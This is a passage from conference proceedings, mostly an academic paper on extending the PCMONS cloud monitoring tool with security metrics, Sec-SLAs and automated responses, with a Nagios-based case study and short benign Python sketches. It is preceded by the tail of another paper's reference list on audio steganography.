[9] N. Cvejic and T. Seppanen, "Increasing Robustness of LSB Audio Steganography Using a Novel Embedding Method", Proceedings of the International Conference on Information Technology: Coding and Computing (ITCC'04), 2004, vol. 2, pp. 533-537.
[10] M. A. Ahmed, M. L. M. Kiah, B. B. Zaidan, and A. A. Zaidan, "A novel embedding method to increase capacity and robustness of low-bit encoding audio steganography technique using noise gate software logic algorithm", Journal of Applied Sciences, 2010, vol. 10, pp. 59-64.
[11] X. Dong, M. Bocko, and Z. Ignjatovic, "Data hiding via phase manipulation of audio signals", IEEE International Conference on Acoustics, Speech, and Signal Processing (ICASSP'04), 2004, vol. 5, pp. 377-380.
[12] K. Gopalan, "Audio steganography using bit modification", Proceedings of the IEEE International Conference on Acoustics, Speech, and Signal Processing (ICASSP'03), vol. 2, pp. 421-424.
[13] S. Shirali-Shahreza and M. Shirali-Shahreza, "High capacity error free wavelet domain speech steganography", Proc. 33rd Int. Conf. on Acoustics, Speech, and Signal Processing (ICASSP 2008), Las Vegas, Nevada, USA, pp. 1729-1732.
[14] N. Cvejic and T. Seppanen, "A wavelet domain LSB insertion algorithm for high capacity audio steganography", Proc. 10th IEEE Digital Signal Processing Workshop and 2nd Signal Processing Education Workshop, Georgia, USA, October 2002, pp. 53-55.
[15] F. Djebbar, H. Hamam, K. Abed-Meraim, and D. Guerchi, "Controlled distortion for high capacity data-in-speech spectrum steganography", International Conference on Intelligent Information Hiding and Multimedia Signal Processing (IEEE-IIHMSP), ISBN: 978-0-7695-4222-5, 2010, pp. 212-215.
[16] Steghide, http://steghide.sourceforge.net/. Retrieved 28 Sept. 2014.
[17] S-Tools Version 4.0, http://info.umuc.edu/its/online lab/ifsm459/s-tools4/. Retrieved 28 Sept. 2014.
[18] Hide4PGP, http://www.heinz-repp.onlinehome.de/Hide4PGP.htm. Retrieved 28 Sept. 2014.
[19] G. S. Kang, T. M. Moran, and D. A. Heide, "Hiding Information Under Speech", Naval Research Laboratory, http://handle.dtic.mil/100.2/ADA443638, Washington, 2005.
[20] B. Paillard, P. Mabilleau, S. Morissette, and J. Soumagne, "PERCEVAL: Perceptual Evaluation of the Quality of Audio Signals", Journal of the Audio Engineering Society, 1992, vol. 40, pp. 21-31.
[21] Y. Hu and P. Loizou, "Evaluation of objective quality measures for speech enhancement", IEEE Transactions on Speech and Audio Processing, vol. 16, no. 1, 2008, pp. 229-238.
[22] N. Cristianini and J. Shawe-Taylor, "An Introduction to Support Vector Machines", Cambridge University Press, 2000.
[23] LIBSVM, http://www.csie.ntu.edu.tw/~cjlin/libsvm. Retrieved 28 Sept. 2014.
Current Issues in Cloud Computing Security and Management
Pedro Artur Figueiredo Vitti, Daniel Ricardo dos Santos,
Carlos Becker Westphall, Carla Merkle Westphall, Kleber Magno Maciel Vieira
Network and Management Laboratory - Department of Informatics and Statistics
Federal University of Santa Catarina - Florianopolis, Santa Catarina, Brazil
{pvitti, danielrs, westphal, carlamw, kleber}@inf.ufsc.br
Abstract—Cloud computing is becoming increasingly popular, and telecommunications companies perceive the cloud as
an alternative to their service deployment models, one that
brings them new possibilities. But to ensure the successful use of
this new model, security and management challenges
still need to be faced. There are numerous threats and
vulnerabilities that become more and more important as the use
of the cloud increases, as well as concerns with stored data and
its availability, confidentiality, and integrity. This situation creates
the need for monitoring tools and services, which provide a way
for administrators to define and evaluate security metrics for their
systems. In this paper, we propose a cloud computing security
monitoring tool based on our previous work on both security
and management for cloud computing.
Keywords–cloud computing; security management; monitoring;
security metrics
I. INTRODUCTION
Cloud computing is a new way to provide computational
resources over the Internet in a transparent and easy manner.
According to the National Institute of Standards and Technology (NIST), it is a model for enabling on-demand network
access to a shared pool of computational resources, comprising
three service models and four deployment models [1].
These service models are: Software as a Service (SaaS),
in which the service provided to the user is in the form of
an application that runs on a cloud infrastructure; Platform
as a Service (PaaS), in which the user can deploy its own
applications in the provider’s infrastructure; and Infrastructure
as a Service (IaaS), in which the user has access to the
computational resources themselves, in the form of virtual
machines, storage, networks and others.
The deployment models are the private, community, public,
and hybrid cloud, and refer to the location of the cloud
infrastructure, who has access to it, and who is responsible
for its management. The most used models are the public
cloud, in which the infrastructure is run by an organization and
provisioned to be used by the general public, and the private cloud,
in which an organization provisions its own infrastructure to be
used by its business units.
In an era where telecommunication providers face ever
greater competition and technology evolution, the basic features of cloud computing such as virtualization, multi-tenancy
and ubiquitous access provide a viable solution to their service
provisioning problems.
Telecoms are now using their own private clouds, or
sometimes public clouds, to host their services and enjoy the
benefits of this new model. With a multi-tenant cloud they can
support an increasing number of subscribers and maintain the
Quality of Experience of their services even when dealing with
high demand. The use of the cloud also helps these companies
transition from a product based business model to a service
based one.
The main advantages of cloud computing are the reduction
of IT costs, increased flexibility and scalability, and the possibility to pay only for the resources used. The users of the
cloud range from individuals to large government or commercial organizations, and each one has their own concerns and
expectations about it.
Among these concerns, security and privacy are the biggest
ones [2]. This comes from the fact that the data that belongs to
users and organizations may no longer be under their absolute
control, being now stored in third party locations and subject
to their security policies, in the case of public clouds.
But even in private clouds, the most common case in
telecom companies, there are new security challenges, such
as providing access to an ever growing number of users while
maintaining efficient and well monitored access control.
It becomes necessary to characterize what are the new risks
associated with the cloud and what other risks become more
critical. These risks must be evaluated and mitigated before
the transition to the cloud.
It is already possible to find in the literature a lot of work
being done in the security aspects of Cloud Computing, describing its challenges and vulnerabilities and even proposing
some solutions [3].
In the rest of this paper, we provide some background on security concerns in cloud computing, briefly describe a previous
implementation of a monitoring tool for the cloud, show how
security information can be summarized and treated from a
management perspective in a Service Level Agreement (SLA),
and then propose a system for monitoring security information
in the cloud.
In Section II, some works related to security in cloud
computing environments are cited. In Section III, currently
existing concerns in the cloud computing security area are presented. In Section IV, an architecture for monitoring clouds is
described. In Sections V and VI, security concerns with SLAs
and the definition of entities, components, metrics, and actions
for security monitoring in cloud computing are shown. Section VII
shows the case study. In Section VIII, lessons learned from
this work are described. Finally, in Section IX, a conclusion
is presented and some future work proposals are made.
II. RELATED WORK
Uriarte and Westphall [4] proposed a monitoring architecture devised for private clouds that focuses on providing data
analytics capabilities to a monitoring system and that considers
the knowledge requirements of autonomic systems. While they argue that, in the development of an analytical monitoring system
for public clouds, security, privacy, and different policies need
to be considered, their proposal does not consider specific
security metrics and Sec-SLAs.
Fernandes et al. [5] survey the works on cloud security
issues. Their work addresses several key topics, namely vulnerabilities, threats, and attacks, and proposes a taxonomy for
their classification. Their work, however, does not consider
metrics monitoring or any implementation details.
CSA [6] has identified the top nine cloud computing
threats. The report shows a consensus among industry experts,
focusing on threats specifically related to the distributed nature
of cloud computing environments. Despite identifying, describing and analyzing these threats, their work does not consider
the monitoring of security metrics related to the identified
threats.
Murat et al. [7] proposed a cloud network security monitoring and response system, which is based on flow measurements
and implements an algorithm that detects and responds to
network anomalies inside a cloud infrastructure. Their proposal,
however, does not take into account security metrics and Sec-SLAs;
instead, it generates and monitors profiles of network
traffic to detect anomalies, and is hence limited in the scope
of security issues it can monitor.
III. SECURITY CONCERNS IN CLOUD COMPUTING
A. Technologies
A lot of different technologies are necessary to create
and manage a cloud environment, according to the kind of
service that this cloud will provide. Cloud computing relies
heavily on virtualization and network infrastructure to support
its elasticity. Technologies such as Web Services, Service
Oriented Architecture (SOA), Representational State Transfer
(REST) and Application Programming Interfaces (API) are
employed to provide users with access to their cloud resources.
Each of these technologies presents some kind of known
vulnerability and possible new exploits in the cloud [8].
B. Challenges, Threats and Vulnerabilities
The usual three basic issues of security (availability, integrity, and confidentiality) are still fundamental in the cloud
and remain a big challenge in this scenario. Each sector
has its main concerns when it comes to the cloud. Industry
services are mostly worried about availability, so that they
keep providing services even during peaks of access, while
academia may be more concerned with integrity and individual
users usually care about the confidentiality of their data. But
every security aspect must be considered together to achieve
security as a whole in this scenario. Because of the multi-tenant characteristic of cloud computing, one single vulnerable
service in a virtual machine may lead to the exploitation of
many services hosted in the same physical machine. Also,
virtualization has an inherent security threat that a user may
escape its confined environment and gain access to the physical
machine resources or to other virtual machines. This requires
complex attacks, but is possible.
Web applications and web services have a long history of
security vulnerabilities, and if not well implemented they are
susceptible to a lot of easily deployed and very well-known
attacks such as SQL injection, Cross-Site Scripting (XSS),
Cross-Site Request Forgery (CSRF) and session hijacking.
Cryptography is the most important technology to provide
data security in the cloud, but problematic implementations
and weak proprietary algorithms have been known problems
for a long time and are still exploited.
Another important topic in cloud security is Identity and
Access Management, because now data owners and data
providers are not in the same trusted domain. New mechanisms for authentication and authorization that consider cloud-specific aspects are needed and are being actively researched
[9].
The main security management issues of a Cloud Service
Provider (CSP) are: availability management, access control
management, vulnerability management, patch and configuration management, countermeasures, and cloud usage and
access monitoring [10].
To remain effective in this new paradigm, some security
tools have to be adapted, such as Intrusion Detection Systems
(IDS), which are critical to monitor and prevent incidents in
the cloud. Because of its distributed nature, the cloud is an
easy target for an intruder trying to use its abundant resources
maliciously, and because of this nature, the IDS also has to be
distributed, to be able to monitor each node [11].
C. Attacks
While the cloud serves many legitimate users, it may also
host malicious users and services, such as spam networks,
botnets and malware distribution channels. Cloud providers
must be aware of those problems and implement the necessary
countermeasures.
Besides that, Distributed Denial of Service (DDoS) attacks
can have a much broader impact on the cloud, since now many
services may be hosted in the same machine. When an attacker
focuses on one service it may affect many others that have no
relation with the main target. DDoS is a problem that is still
not very well handled. On the other hand, since the cloud
provides greater scalability and may allocate resources almost
instantaneously it becomes more resilient to denial of service,
but it comes with a cost to the users.
D. Data Security
The security and privacy of the data stored in the cloud
is, perhaps, the most important challenge in cloud security. To
maintain data security a provider must include, at least: an
encryption schema, an access control system, and a backup
plan [12].
However, data encryption can be a hindrance in the cloud
because of the current impossibility to efficiently process or
query over encrypted data [2]. There is active research in
these areas, with techniques such as Searchable Encryption
and Fully Homomorphic Encryption, but their applications
are still limited and they cannot yet be used in large scale
environments.
When moving to the cloud it is important that a prospective
customer knows to what risks its data are being exposed. Some
of the key points a user must consider in this migration are
[13]: The cloud administrators will have privileged access to
user data, and possibly bypass access controls; The provider
must comply to legal requirements, depending on the kind of
data the user intends to store; The location of the user’s data
may now be unknown to them; How the data of one user are
kept separate from others; The provider must have a capacity
to restore a system and recover its data through backup and
replication; The provider must formally ensure full support in
the case of an investigation over inappropriate activities; and
The data must be in a standardized format and be available to
the user even in the case the provider goes out of business.
E. Legal Compliance
Legal compliance is fundamental when dealing with cloud
computing. In the cloud world, it is possible that data cross
many jurisdiction borders and have to be treated in compliance
to many different laws and regulations. This is one of the
reasons why security plays such an important role in cloud
adoption and development, especially for the CSPs.
To achieve compliance both providers and users must be
held responsible for how data is collected, stored and transmitted, especially sensitive data, such as Personally Identifiable
Information (PII).
Among the most important tools to ensure legal compliance
are external audits and security certifications.
F. Telecommunications
The deployment and provisioning of telecommunication
services becomes easier in the cloud, and it empowers telecom
providers with greater scalability and flexibility. Those advantages, however, come with the cost of new security challenges.
Security plays such a vital role in telecommunications that
many telecommunication networks are built from the ground up with security requirements in mind. This, however, is not
true for many Internet protocols. When transitioning to the
cloud, telecom providers must be aware that their services are
being deployed in a different scenario, one that has to be well
understood before this transition is considered.
Availability, for instance, is critical to the telecom business
and if services are being deployed in a public cloud without
a proper SLA, server downtime will cause a lot of trouble.
Confidentiality is also fundamental, since telecoms collect and
store a lot of data from their clients, from personal data to
information about their communications.
IV. CLOUD MONITORING
The provisioning of cloud services represents a challenge
to service monitoring. It requires complex procedures to be
well accomplished, which leads to the development of new
management tools. Our team has previously proposed and
implemented an open-source cloud monitoring architecture and
tool called the Private Cloud Monitoring System (PCMONS)
[14].
The architecture of the system is divided in three layers
(see Figure 1):
• Infrastructure - Consists of basic facilities, services
and installations and available software, such as operating systems and hypervisors;
• Integration - Responsible for abstracting the infrastructure details for the view layer; and
• View - The interface through which information is
analyzed.
The main components of the architecture are (see Figure
1):
• Node information gatherer - Gathers local information
on a node;
• VM monitor - Injects scripts into the virtual machine
(VM) that send data to the monitoring system;
• Configuration Generator - Generates the configuration
files for the tools in the view layer;
• Monitoring tool server - Receives data from different resources and takes actions such as storing it; and
• Database - Stores data needed by the Configuration Generator and the Monitoring Data Integrator.
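As an illustration of what a node-side gatherer might collect, the following sketch builds a hypothetical report payload; the real PCMONS component and its wire format are not specified here:

```python
import json
import os
import platform
import time

def gather_node_info() -> dict:
    """Collect basic local facts a node-side gatherer could report upstream.

    Hypothetical payload shape; PCMONS's actual gatherer is not shown
    in the paper.
    """
    info = {
        "host": platform.node(),
        "timestamp": int(time.time()),
        "os": platform.system(),
    }
    if hasattr(os, "getloadavg"):          # load averages are POSIX-only
        info["load_1min"] = os.getloadavg()[0]
    return info

# Serialize as JSON, as a gatherer might before sending to the server.
payload = json.dumps(gather_node_info())
print(payload)
```

In the architecture above, such a payload would travel from the infrastructure layer to the monitoring tool server, which stores it for the view layer.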
V. SECURITY CONCERNS IN SLA
Security is not only a matter of preventing attacks and
protecting data, it also has to be considered in a management
perspective. Providers must have ways to ensure their clients
that their data is safe and must do so by monitoring and
enhancing security metrics.
A SLA formally defines the level of service a provider
must guarantee. SLAs are a fundamental part of network
management, and are also applied in cloud computing. They
are defined in terms of metrics that must be monitored to
ensure that the desired levels of service are reached.
SLAs may also be used in the definition, monitoring and
evaluation of security metrics, in the form of Security SLAs,
or Sec-SLAs [15]. In this case, the SLA considers security
service levels.
To accomplish this, the first step is to define a set of
security metrics, which in itself is not easy. Though there is not
a definitive set of security metrics that is considered relevant in
every case, researchers tend to use or adapt concepts gathered
from international standards such as ISO 27002. Some issues
that are usually considered are cryptography, packet filtering,
redundancy, availability, and backup.
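A Sec-SLA of this kind can be represented as a small set of metric thresholds checked against measurements; the clause names and threshold values below are hypothetical, not taken from the paper or from ISO 27002:

```python
# A hypothetical Sec-SLA: each clause is a target the provider must meet.
sec_sla = {
    "backup_max_age_hours": 24,       # last backup no older than one day
    "min_encryption_key_bits": 256,   # stored data encrypted with >= 256-bit keys
    "max_failed_logins_24h": 50,      # brute-force indicator threshold
}

def evaluate_sec_sla(measured: dict, sla: dict) -> list:
    """Return the list of violated Sec-SLA clauses for a set of measurements."""
    violations = []
    if measured["backup_age_hours"] > sla["backup_max_age_hours"]:
        violations.append("backup_max_age_hours")
    if measured["encryption_key_bits"] < sla["min_encryption_key_bits"]:
        violations.append("min_encryption_key_bits")
    if measured["failed_logins_24h"] > sla["max_failed_logins_24h"]:
        violations.append("max_failed_logins_24h")
    return violations

print(evaluate_sec_sla(
    {"backup_age_hours": 30, "encryption_key_bits": 256, "failed_logins_24h": 12},
    sec_sla,
))  # ['backup_max_age_hours']
```

Monitoring then reduces to periodically feeding fresh measurements into such an evaluator and reporting any violated clauses.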
VI. CLOUD SECURITY MONITORING
Security monitoring is inherently hard, because the agent-manager approach normally used in the monitoring of other
kinds of SLA does not fit easily to every security characteristic
[15].
Cloud computing has been evolving for many years, and
only now are we able to have a broader view of what exactly
it is and, hence, what its security requirements are, based on
recent definitions and publications.
With this new perspective it is now possible to define good
security metrics that can be used to provide a clear view of
the level of security being employed in a CSP and its virtual
machines.
We now propose an extension to the PCMONS architecture
and tool to enable security monitoring for cloud computing. We
also present the security metrics which we consider adequate
to be monitored in a cloud infrastructure and which provide a
good picture of security as a whole in this environment.
The tool uses data and logs gathered from security software
available in the monitored systems, such as IDSs, anti-malware
software, file system integrity verification software, backup
software and web application firewalls, and presents these data
to the cloud administrators.
Besides providing reliable metrics and information about the
security of their systems to administrators, this monitoring
architecture can also be used in the auditing and outsourcing
of security services.
The main components of the proposal can be seen in Figure
1 and are described below.
A. Entities
The entities involved in the definition, configuration and
administration of the security SLAs and metrics are:
• Cloud users - The users of the cloud infrastructure. They negotiate the SLAs with the CSP and expect them to be accomplished;
• Cloud administrators - The administrators of the CSP. Their role is to monitor the cloud infrastructure; and
• Security applications - The applications which produce the security information that will be gathered.

Figure 1. Three Layers Monitoring Architecture

The first two entities were part of the previous PCMONS, while the third was introduced in our extension.
B. Components
Since PCMONS is modular and extensible, the components
used in the new architecture are the same already available, but
with extensions that allow the monitoring of security metrics.
The extensions are new scripts to gather the security
data from the many sources needed and an extension to the
visualization tool to show this data.
C. Metrics
As mentioned in Section IV, the definition of security
metrics is not an easy task, and it becomes even harder in
the cloud.
Here, we present the basic metrics we intended to monitor.
These metrics were chosen because we consider they cover a
great part of what was considered critical in a cloud provider,
based on the survey presented in Section II.
We divided the set of metrics into subsets related to each
security aspect that will be treated. There are four subsets of
metrics. The first three are related to each individual virtual
machine. Data Security Metrics, Access Control Metrics and
Server Security Metrics are shown in Table I, Table II, and
Table III, respectively.
D. Actions
We decided to introduce a new module to take actions
based on the monitored metrics and possible violations to the
Sec-SLA. As an example, if a virtual machine has had a huge
number of failed access attempts in the last hours we may want
to lock any further access to it and communicate the possible
issue to the administrator of that machine. Also, if malware
was detected on a machine we may want to shut it down
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
to prevent it from infecting other VMs in the same physical
machine. These actions will be predefined scripts available to
cloud administrators and may be enabled or disabled by them
at any time.
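A minimal sketch of such an action module might map violations to predefined, toggleable action scripts; the violation and script names below are hypothetical:

```python
# Hypothetical action module: map metric violations to predefined actions
# that administrators can enable or disable at any time.
ACTIONS = {
    "failed_access_burst": {"enabled": True,  "script": "lock_vm_access"},
    "malware_detected":    {"enabled": True,  "script": "shutdown_vm"},
    "integrity_failure":   {"enabled": False, "script": "notify_admin"},
}

def dispatch(violation: str, vm_id: str) -> str:
    """Return the action script fired for a violation, or 'ignored'."""
    action = ACTIONS.get(violation)
    if action is None or not action["enabled"]:
        return "ignored"
    return f"{action['script']}({vm_id})"

print(dispatch("failed_access_burst", "vm-42"))   # lock_vm_access(vm-42)
print(dispatch("integrity_failure", "vm-42"))     # ignored (action disabled)
```

Keeping the mapping in data rather than code is one way to let administrators toggle individual responses without redeploying the monitor.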
VII. CASE STUDY
We have implemented the metrics presented in Tables I-III and gathered the data generated in a case study. The
implementation of the data gathering scripts was done in
Python, and the data are shown in the Nagios interface.
Our infrastructure consisted of two physical servers, one
hosting the OpenNebula cloud platform and another hosting
the virtual machine instances.
Several virtual machines running the Ubuntu operating
system and the security software needed to provide the security
metrics were instantiated. The following software was used to
gather the security information: dm-crypt (encryption), rsync
(backup), Tripwire (filesystem integrity), SSH (remote access),
ClamAV (anti-malware), Tiger (vulnerability assessment) and
uptime (availability).
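As an illustration of what such a gathering script might look like, the sketch below computes the "Failed access attempts" metric from OpenSSH-style auth-log lines. The log format, sample lines, and counting approach are assumptions for illustration, not the paper's actual scripts:

```python
import re

# Sketch of a data-gathering script for the "Failed access attempts"
# metric. The regex matches OpenSSH-style "Failed password" entries;
# the exact log format is an assumption for illustration.
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")

def count_failed_attempts(log_lines):
    """Count failed SSH login attempts in a list of auth-log lines."""
    return sum(1 for line in log_lines if FAILED.search(line))

# Hypothetical sample of auth-log lines.
sample = [
    "Nov 17 10:01:02 vm1 sshd[123]: Failed password for root from 10.0.0.5 port 4242 ssh2",
    "Nov 17 10:01:05 vm1 sshd[124]: Failed password for invalid user admin from 10.0.0.5 port 4243 ssh2",
    "Nov 17 10:02:00 vm1 sshd[130]: Accepted password for alice from 10.0.0.9 port 5000 ssh2",
]
```

A deployed script would additionally restrict the count to a 24-hour window (per Table II) and emit the value in the format the monitoring tool expects.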
The VMs were automatically attacked by brute force login
attempts and malware being downloaded and executed, as well
as access attempts to ports blocked by the firewall. During
the tests there were also simulations of regular usage, encompassing valid accesses and simple user tasks performed on the
machines, such as creating and deleting files. The malware
scans, vulnerability scans, integrity checks and backups were
performed as scheduled tasks on the operating system using
the latest versions of Linux Malware Detect [16], OpenVAS [17],
AFICK [18], and Amanda [19], respectively. We did not stress
the environment to test for scalability issues because it had
already been done with the previous versions of PCMONS.
Figure 2 shows an example of an early snapshot of the
monitoring environment. It illustrates how the metrics are
displayed in Nagios and the view a network administrator
has of a single machine. The metrics
HTTP CONNECTIONS, LOAD, PING, RAM and SSH are
from the previous version of PCMONS and are not strictly
related to security, but they are shown alongside the security metrics.
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
TABLE I. DATA SECURITY METRICS

Metric                  Description
Encrypted Data?         Indicates whether the data stored in the VM is encrypted
Encryption Algorithm    The algorithm used in the encryption/decryption process
Last backup             The date and time when the last backup was performed
Last integrity check    The date and time when the last file system integrity check was performed
TABLE II. ACCESS CONTROL METRICS

Metric                     Description
Valid Accesses             The number of valid access attempts in the last 24 hours
Failed access attempts     The number of failed access attempts in the last 24 hours
Password change interval   The frequency with which users must change passwords in the VM's operating system
TABLE III. SERVER SECURITY METRICS

Metric                    Description
Malware                   Number of malware detected in the last anti-malware scan
Last malware scan         The date and time of the last malware scan in the VM
Vulnerabilities           Number of vulnerabilities found in the last scan
Last vulnerability scan   The date and time of the last vulnerability scan in the VM
Availability              Percentage of the time in which the VM is online
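For reference, the three metric subsets can be expressed as a simple registry. The snake_case identifiers and the dictionary layout below are illustrative assumptions rather than PCMONS internals:

```python
# The metric subsets of Tables I-III expressed as a simple registry.
# Grouping and field names are illustrative; PCMONS may store these
# differently.
SECURITY_METRICS = {
    "data_security": [
        "encrypted_data", "encryption_algorithm",
        "last_backup", "last_integrity_check",
    ],
    "access_control": [
        "valid_accesses", "failed_access_attempts",
        "password_change_interval",
    ],
    "server_security": [
        "malware", "last_malware_scan",
        "vulnerabilities", "last_vulnerability_scan", "availability",
    ],
}

def subset_of(metric):
    """Return which security aspect a metric belongs to, or None."""
    for subset, metrics in SECURITY_METRICS.items():
        if metric in metrics:
            return subset
    return None
```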
It is important to note that the accuracy of the obtained
information depends on the security software being monitored.
Our solution aggregates these data and presents them in a way
that is clearer and easier to monitor. The tool helps network
and security administrators perceive violations of Sec-SLAs and
actively respond to threats.
In this case study, considering the automatic attacks previously
described, the most violated metrics were the failed
access attempts and the anti-malware events, as well as availability,
because of malware that would cause denial of service.
Since we obtained a high number of violations in an
environment that was designed to be under constant attack, the
results suggest that the chosen metrics are good indicators of the
overall security of the virtual machines.
VIII. KEY LESSONS LEARNED
A. Background
Monitoring and managing security aspects remains a challenge
that must be faced to enable the full potential of the
cloud, and only now, with a recently agreed-upon definition of
exactly what cloud computing is, can it be properly addressed. The
major piece of technology used to provide security in the cloud
is cryptography.
Data leakage and data loss are possibly the greatest concerns
of cloud users. If the CSP acts unfaithfully, the users may
not even become aware of incidents that compromise their data.
There must be ways to verify data integrity, so that users are
certain their data were not corrupted. Backup and recovery are
also fundamental tools to ensure the availability of customer
data.
The greatest challenge to security monitoring in a cloud
environment is the fact that the cloud provides services on
demand, creating a highly dynamic and flexible system to
which the metrics have to be adapted.
SLAs are fundamental to provide customers with the
needed guarantees that the service they are hiring will be
adequately provided, their machines will be secure and their
data will be securely stored, transmitted and processed.
Security metrics and a more quantitative approach to security, in both the definition of requirements and their monitoring,
remain an important open research topic.
There are other important security metrics that are related
to the security processes of the CSP, such as employee training,
physical security and contingency plans. These were not taken
into account in this work because they cannot be automatically
gathered and monitored.
B. Design and Implementation
The design of a software project and related architectural
decisions may consume a great deal of time before the implementation
is even started. Building an extension over a previous architecture,
as in our case, may greatly reduce this time.
Nevertheless, many important decisions have to be made
to achieve a final functioning software. The major decisions in
this case were related to the security metrics and the software
used to provide the necessary security data.
As already stated in this paper, defining and quantifying
security is no easy task; therefore, it was the most time-consuming
aspect of the project. Trying to come up with a
simple set of metrics that represents the state of security of a
whole cloud not only seems, but definitely is, a daunting task.
Something that became clear with this implementation is
that no single set of metrics can embrace every security need,
and so to define the metrics we based our approach on the
common security issues described in the literature, as well as
issues that are consistently cited as the most critical by industry
users. It is also important to note that the definition and
monitoring of metrics must be flexible enough to accommodate
different potential uses of the software.
After defining what is going to be measured it is necessary
Figure 2. Nagios simplified interface of the monitored cloud services
to focus on how to do it. The idea of analyzing logs to obtain
security data is classical in information security and it seemed
like a natural approach to our challenge.
To read, parse, and present the data, we chose the
Python programming language because it already formed the
base of PCMONS and fits these kinds of tasks very well.
An important aspect of the proposed solution is its modularity.
Because of this feature, we were able to introduce
the new metrics and adapt the tool to our needs without changing
anything that was already done in terms of basic monitoring.
We believe the same can be achieved anytime it becomes
necessary to adapt the software to new particular monitoring
needs.
Modularity and extensibility are necessary approaches
when you deal with such dynamic and highly scalable environments, because you have to be certain that you will be
able to adjust the software to your future needs, which may
be very different from current ones. The most challenging
metrics in terms of implementation were those that gathered
data from non-standard security software, such as tripwire,
because we had to understand the data they generated to
interface them with PCMONS. The analysis of our results
shows that PCMONS was able to comply with our defined
set of metrics, since their implementation relied on established
security software, and that the definition and implementation
of new metrics may be done in the future without the need for
a great architectural redesign.
C. Testing Environment
Setting up a reliable testing environment was also extremely important to the success of the project. Setting up
a private cloud is often advertised as being simple and
convenient, but that is not always true when we have to
deal with specificities of architectures, operating systems and
hypervisors.
Our private cloud has been evolving for some years and
through the realization of other projects we were able to gather
experience on deploying, managing and monitoring it, which
allowed us to choose tools we already knew would work well
together.
Since the whole cloud infrastructure is built upon a piece of
software, it is important to know that it is stable, reliable, well
documented and provides available support. Our choice for the
OpenNebula platform came from previous experience with it
and its widespread use by many big players in the industry,
such as Telefonica, Akamai and IBM.
An important feature of this extension of PCMONS is
that it can run over Eucalyptus, OpenNebula and OpenStack,
monitoring virtual machines in every platform. The support for
different cloud platforms reflects the evolution of cloud tools
and a greater effort being made in terms of standardization,
interoperability and portability, all of which are big issues in
cloud computing.
The use of scripting languages in the development process,
such as Python and Bash, allowed us to define the
metrics and implement and test them on the fly in the testing environment,
without needing to stop services, compile software,
test it, compile it again, and so on. This approach required less
intensive use of the testing environment during development
and accelerated the whole process.
IX. CONCLUSION AND FUTURE WORK
This paper described a few of our previous works in the
field of Cloud Computing and how to bring them all together
in order to develop a cloud security monitoring architecture.
The use of cloud computing is a great option for telecommunications
companies that want to reduce OPEX and CAPEX
and still improve their service provisioning. Security,
nevertheless, must be carefully planned and monitored to
ensure that the transition to the cloud runs smoothly.
The paper described the design and implementation of a
cloud security monitoring tool, and how it can gather data
from many security sources inside VMs and the network in
which the physical machines are to give administrators a clear
view of the security of their systems and allow Cloud Service
Providers to give users guarantees about the security of their
machines and data.
Currently, there are not many solutions to cloud security
monitoring, and this paper shows it is possible to build such
a system based on previous work.
As future work, we can point to the definition and implementation
of new metrics and better integration with existing
Security SLAs, planning to include a new module to handle
possible actions to be taken in response to metric violations,
such as locking a virtual machine or shutting it down.
Also, it would be important to study the integration of the
security monitoring model with other active research fields in
cloud security, such as Identity and Access Management and
Intrusion Detection Systems.
ACKNOWLEDGEMENT
We would like to thank Salvatore Loreto, Saverio Niccolini
and Vijay Gurbani for their prior review and for their help in
improving the paper.
REFERENCES
[1] P. Mell and T. Grance, The NIST definition of cloud computing. [Online]. Available: http://csrc.nist.gov/publications/nistpubs/800-145/SP800-145.pdf (2011) [retrieved: Sept, 2014]
[2] K. Ren, C. Wang, and Q. Wang, "Security challenges for the public cloud," Internet Computing, IEEE, vol. 16, no. 1, Jan.-Feb. 2012, pp. 69-73.
[3] F. Shaikh and S. Haider, "Security threats in cloud computing," in Internet Technology and Secured Transactions (ICITST), 2011 International Conference for, 2011, pp. 214-219.
[4] R. B. Uriarte and C. B. Westphall, "Panoptes: A monitoring architecture and framework for supporting autonomic clouds," in Network Operations and Management Symposium (NOMS), 2014 IEEE. IEEE, 2014, pp. 1-5.
[5] D. Fernandes, L. Soares, J. Gomes, M. Freire, and P. Incio, "Security issues in cloud environments: a survey," International Journal of Information Security, vol. 13, no. 2, 2014, pp. 113-170. [Online]. Available: http://dx.doi.org/10.1007/s10207-013-0208-7 [retrieved: Sept, 2014]
[6] T. T. W. Group et al., "The notorious nine: cloud computing top threats in 2013," Cloud Security Alliance, 2013.
[7] M. Mukhtarov, N. Miloslavskaya, and A. Tolstoy, "Cloud network security monitoring and response system," ITSSA, vol. 8, no. Special Issue on Cloud Computing and Services, 2012, pp. 71-83.
[8] B. Grobauer, T. Walloschek, and E. Stocker, "Understanding cloud computing vulnerabilities," Security Privacy, IEEE, vol. 9, no. 2, March-April 2011, pp. 50-57.
[9] X. Tan and B. Ai, "The issues of cloud computing security in high-speed railway," in Electronic and Mechanical Engineering and Information Technology (EMEIT), 2011 International Conference on, vol. 8, 2011, pp. 4358-4363.
[10] F. Sabahi, "Cloud computing security threats and responses," in Communication Software and Networks (ICCSN), 2011 IEEE 3rd International Conference on, 2011, pp. 245-249.
[11] K. Vieira, A. Schulter, C. Westphall, and C. Westphall, "Intrusion detection for grid and cloud computing," IT Professional, vol. 12, no. 4, 2010, pp. 38-43.
[12] L. Kaufman, "Data security in the world of cloud computing," Security Privacy, IEEE, vol. 7, no. 4, 2009, pp. 61-64.
[13] S. Chaves, C. Westphall, C. Westphall, and G. Geronimo, "Customer security concerns in cloud computing," in ICN 2011, The Tenth International Conference on Networks, 2011, pp. 7-11.
[14] S. De Chaves, R. Uriarte, and C. Westphall, "Toward an architecture for monitoring private clouds," Communications Magazine, IEEE, vol. 49, no. 12, 2011, pp. 130-137.
[15] S. de Chaves, C. Westphall, and F. Lamin, "SLA perspective in security management for cloud computing," in Networking and Services (ICNS), 2010 Sixth International Conference on, 2010, pp. 212-217.
[16] R. MacDonald, Linux Malware Detect. [Online]. Available: https://www.rfxn.com/projects/linux-malware-detect/ (2014) [retrieved: Sept, 2014]
[17] R. Deraison, Open Vulnerability Assessment System. [Online]. Available: http://www.openvas.org/ (2014) [retrieved: Sept, 2014]
[18] E. Gerbier, Another File Integrity Checker. [Online]. Available: http://afick.sourceforge.net/ (2014) [retrieved: Sept, 2014]
[19] J. da Silva, Advanced Maryland Automatic Network Disk Archiver. [Online]. Available: http://www.amanda.org/ (2014) [retrieved: Sept, 2014]
